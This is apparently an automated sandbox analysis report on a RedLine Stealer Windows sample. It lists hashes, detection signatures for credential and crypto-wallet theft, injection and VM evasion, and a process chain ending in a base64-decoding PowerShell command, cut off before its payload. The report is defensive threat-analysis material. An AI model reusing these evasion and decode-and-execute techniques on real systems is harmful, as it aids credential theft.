Windows
Analysis Report
f6FauZ2CEz.exe
Overview
General Information
| Field | Value |
|---|---|
| Sample name | f6FauZ2CEz.exe (renamed because the original name is a hash value) |
| Original sample name | 1544dbca0efc2c0105dd7d52a21a8891.exe |
| Analysis ID | 1431938 |
| MD5 | 1544dbca0efc2c0105dd7d52a21a8891 |
| SHA1 | 7fbacdb27457829215cd182eab0a4e4bb4379648 |
| SHA256 | d5038b0adfdfc36c23dbaafd982bb50bb0e9fc10838e731e10d182d91b28d970 |
| Tags | exe, RedLineStealer |
Detection
RedLine
| Field | Value |
|---|---|
| Score | 100 |
| Range | 0 - 100 |
| Whitelisted | false |
| Confidence | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected RedLine Stealer
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs new ROOT certificates
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops certificate files (DER)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- f6FauZ2CEz.exe (PID: 6696, cmdline: "C:\Users\user\Desktop\f6FauZ2CEz.exe", MD5: 1544DBCA0EFC2C0105DD7D52A21A8891)
- wscript.exe (PID: 4928, cmdline: "wscript.exe" "C:\Users\user\start.vbs", MD5: FF00E0480075B095948000BDC66E81F0)
- cmd.exe (PID: 5728, cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" ", MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1020, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 1188, cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('[long base64-encoded PowerShell payload omitted; the report is cut off inside this argument]